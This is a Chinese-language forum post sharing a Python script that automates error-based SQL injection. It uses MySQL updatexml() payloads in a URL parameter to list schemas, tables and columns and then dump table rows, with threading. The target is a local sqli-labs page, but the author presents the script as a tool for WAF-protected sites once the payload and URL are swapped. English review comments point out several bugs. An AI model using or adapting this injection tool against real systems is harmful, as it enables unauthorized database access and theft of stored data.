有些带waf的网站,就导致sqlmap需要编写绕waf脚本
特意编写了一个报错注入脚本 改成你的绕waf的payload,以及url 就能使用
写得很乱,希望大牛指点一下优化,感谢
以后还会加上盲注 延时注入
附上
#author:康同学
"""
一个女孩 对 一个男孩失望了甚至绝望了,
这还有可能嘛?
"""
import threading
import requests
import re
class error():
    """Error-based SQL injection probe against the fixed sqli-labs URL in `page`.

    Every query is appended to the `id` GET parameter.  The injected
    `updatexml(...)` expression makes MySQL raise an XPath syntax error whose
    message echoes the selected value between `~` delimiters; `pattern` pulls
    that value back out of the response body.  The information leak therefore
    depends entirely on the server returning the raw database error text.

    Results are accumulated on the instance lists below.  `qu_tables_name` and
    `qu_column_name` are also called from worker threads (see
    `database_threading` / `table_threading`) and append to these lists without
    a lock.
    """
    # Constructor: one result list per enumeration stage.
    def __init__(self):
        self.list_database=[] # schema (database) names found
        self.list_table=[] # table names found
        self.list_column=[] # column names found
        self.list_content=[] # row values ("col1~col2") found
    def page(self,payload):
        """Send one GET request with *payload* appended to the fixed URL; return the body text.

        *payload* is used verbatim (callers pre-encode spaces as %20) and is
        appended directly after the literal `id=1%20` of the target URL.
        Raises whatever `requests.get` raises; no status-code check is done.
        """
        headers={
        # NOTE(review): the header name below contains spaces ('User - Agent'),
        # so it is not sent as a standard User-Agent header.
        'User - Agent': 'Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 79.0) Gecko / 20100101Firefox / 79.0',
        # 'Cookie': <redacted>  -- NOTE(review): the original listing had a pasted
        # live session cookie here (uid, uname, credential-like hashes for a
        # third-party site); it has been removed from this commented-out line.
        }
        url='http://127.0.0.1/sqli-labs-master/Less-2/?id=1%20'+payload
        response=requests.get(url,headers=headers)
        return response.text
    # Captures the text between the `~` markers of MySQL's "... error: '~...~'" message.
    # NOTE(review): not a raw string, so `\:` and `\'` are non-standard escapes
    # (Python emits a DeprecationWarning for them).
    pattern = re.compile('error\: \'~(.*?)~\'', re.S)
    # Enumerate schema names into self.list_database.
    def qu_database_name(self):
        """Query the schema count, then fetch each schema name one `limit` offset at a time."""
        count = 'or%20updatexml(0,concat(0x7e,(select%20count(schema_name)%20from%20information_schema.schemata),0x7e),1)--+'
        html=self.page(count) # send the request and keep the response body
        database_count=re.findall(self.pattern,html) # extract the echoed count (a list of strings)
        # Fetch every schema name.
        for i in database_count:
            # The inner loop reuses the name `i`: `range(int(i))` is evaluated once
            # with the outer string count, after which `i` is the integer offset.
            for i in range(int(i)):
                database=f'or%20updatexml(0,concat(0x7e,(select%20schema_name%20from%20information_schema.schemata%20limit {i},1),0x7e),1)--+'
                schema_name=self.page(database)
                schema_names=re.findall(self.pattern,schema_name)
                for schema_name in schema_names:
                    self.list_database.append(schema_name) # append to the result list
    # Enumerate table names of one schema into self.list_table.
    def qu_tables_name(self,database):
        """Query the table count for *database*, then fetch each table name by offset.

        *database* is interpolated into the query string unescaped.
        """
        count_table = f'or%20updatexml(0,concat(0x7e,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=\'{database}\'),0x7e),1)--+'
        html_table=self.page(count_table)
        table_count=re.findall(self.pattern,html_table)
        for i_counts in table_count:
            for i_count in range(int(i_counts)):
                table=f'or%20updatexml(0,concat(0x7e,(select%20table_name from%20information_schema.tables%20where%20table_schema=\'{database}\'%20limit%20{i_count},1),0x7e),1)--+'
                table_name=self.page(table)
                table_names=re.findall(self.pattern,table_name)
                for table_name_list in table_names:
                    self.list_table.append(table_name_list)
    # Enumerate column names of one table into self.list_column.
    def qu_column_name(self,table):
        """Query the column count for *table*, then fetch each column name by offset.

        The lookup is by `table_name` only (no schema qualifier), so tables with
        the same name in several schemas are counted together.  *table* is
        interpolated unescaped.
        """
        count_column = f'or%20updatexml(0,concat(0x7e,(select%20count(column_name) from%20information_schema.columns%20where%20table_name=\'{table}\'),0x7e),1)--+'
        column_html=self.page(count_column)
        column_count=re.findall(self.pattern,column_html)
        for counts in column_count:
            for count in range(int(counts)):
                column_payload=f'or%20updatexml(0,concat(0x7e,(select%20column_name from%20information_schema.columns%20where%20table_name=\'{table}\'%20limit%20{count},1),0x7e),1)--+'
                column_name=self.page(column_payload)
                column_names=re.findall(self.pattern,column_name)
                for column_name in column_names:
                    self.list_column.append(column_name)
    # Dump two columns of one table into self.list_content.
    def qu_content_name(self,content1,content2,table):
        """Fetch `concat(content1, '~', content2)` for rows of *table*, one offset per request.

        The row count is requested first but its value is never used: for each
        count match the inner loop runs a fixed 1000 offsets regardless.
        *content1*, *content2* and *table* are interpolated unescaped, and these
        payloads mix literal spaces with %20 unlike the other methods.
        """
        content_payload=f'or%20updatexml(0,concat(0x7e,(select count({content1}) from {table}),0x7e),1)--+'
        content_html=self.page(content_payload)
        content_counts=re.findall(self.pattern,content_html)
        for content_count in content_counts:
            for content_count_1 in range(1000): # fixed upper bound; `content_count` is ignored
                content_payload2=f'or%20updatexml(0,concat(0x7e,(select concat({content1},0x7e,{content2}) from%20{table}%20limit%20{content_count_1},1),0x7e),1)--+'
                content_name_html=self.page(content_payload2)
                content_names=re.findall(self.pattern,content_name_html)
                for content_name in content_names:
                    self.list_content.append(content_name)
#类对象
# Module-level instance shared by all thread workers below.  Rebinding the name
# `error` shadows the class, so no second instance can be created after this line.
error=error()
def database_threading():
    """Run `error.qu_tables_name` once per configured schema name, each in its own thread.

    The schema names are hard-coded in `schema_name` (edit the list to use).
    All threads append to the shared `error.list_table` without a lock.
    """
    # Schema names to enumerate.
    table_count=[]
    schema_name=[''] # add the database names to query; any number of entries
    threading_count=len(schema_name) # number of databases / threads
    for i in range(threading_count):
        t=threading.Thread(target=error.qu_tables_name,args=(schema_name[i],)) # Thread(target, args)
        table_count.append(t) # collect the thread
    for i in range(threading_count):
        table_count[i].start() # start the thread
    for i in range(threading_count):
        table_count[i].join() # wait for the thread to finish
#指定表名称查字段
# Enumerate columns for the configured table names.
def table_threading():
    """Run `error.qu_column_name` once per configured table name, each in its own thread.

    The table names are hard-coded in `columns_name1` (edit the list to use).
    All threads append to the shared `error.list_column` without a lock.
    """
    columns_name1=[''] # add the table names to query; any number of entries
    threading_column=[]
    threading_count=len(columns_name1)
    for i in range(threading_count):
        t=threading.Thread(target=error.qu_column_name,args=(columns_name1[i],))
        threading_column.append(t)
    for i in range(threading_count):
        threading_column[i].start()
    for i in range(threading_count):
        threading_column[i].join()
#start
# Entry point.
def main():
    """Run the three enumeration stages and print each result list.

    Stage 1 (schema names) runs on the main thread.  Stage 2 starts
    `database_threading` and `table_threading` concurrently, so column
    enumeration does not wait for table enumeration; both rely on the
    hard-coded name lists inside those functions.  Stage 3 calls
    `qu_content_name` with the placeholder arguments below, which must be
    filled in by hand.
    """
    # Schema names.
    error.qu_database_name()
    print(error.list_database) # print the collected schema names
    # Threads and their target functions.
    threading_count_shu_1=[]
    threading_error=[database_threading,table_threading]
    # Create one thread per target.
    for i in range(0,2):
        t=threading.Thread(target=threading_error[i])
        threading_count_shu_1.append(t)
    threading_count_count=len(threading_count_shu_1)
    for i_thread in range(threading_count_count):
        threading_count_shu_1[i_thread].start()
    for i_thread in range(threading_count_count):
        threading_count_shu_1[i_thread].join()
    print(error.list_table)
    print(error.list_column)
    # Row dump.
    error.qu_content_name('', '', '') # three arguments: column 1, column 2, table name
    print(error.list_content)
# Script guard: only run when executed directly, not when imported.
if __name__=='__main__':
    main()